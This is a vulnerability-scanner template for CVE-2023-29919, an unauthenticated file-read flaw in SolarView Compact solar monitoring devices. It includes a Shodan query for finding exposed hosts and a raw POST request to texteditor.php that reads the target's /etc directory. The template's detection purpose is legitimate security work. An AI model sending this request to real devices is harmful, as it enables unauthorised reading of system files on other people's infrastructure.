id: CVE-2023-29919 info: name: SolarView Compact <= 6.00 - Local File Inclusion author: For3stCo1d severity: critical description: | There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php impact: | An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to a patched version of SolarView Compact or apply the vendor-provided security patch to mitigate the LFI vulnerability. reference: - https://github.com/xiaosed/CVE-2023-29919 - https://nvd.nist.gov/vuln/detail/CVE-2023-29919 - https://www.solarview.io/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2023-29919 cwe-id: CWE-276 epss-score: 0.01262 epss-percentile: 0.84151 cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: contec product: solarview_compact_firmware shodan-query: http.html:"SolarView Compact" tags: cve,cve2023,lfi,solarview,edb,contec http: - raw: - | POST /texteditor.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded directory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F matchers-condition: and matchers: - type: word part: body words: - 'action="texteditor.php"' - 'adduser.conf' - 'deluser.conf' condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 490a00463044022078792a15bd49c844033b4a7be040b4cdc1526dac3fdfc93a37d8e3dedf08e514022040a0862b3e8dfcb6e029fb3e3f05a6f6a526861ad6179219c15a6e2ad3903739:922c64590222798bb761d5b6d8e72950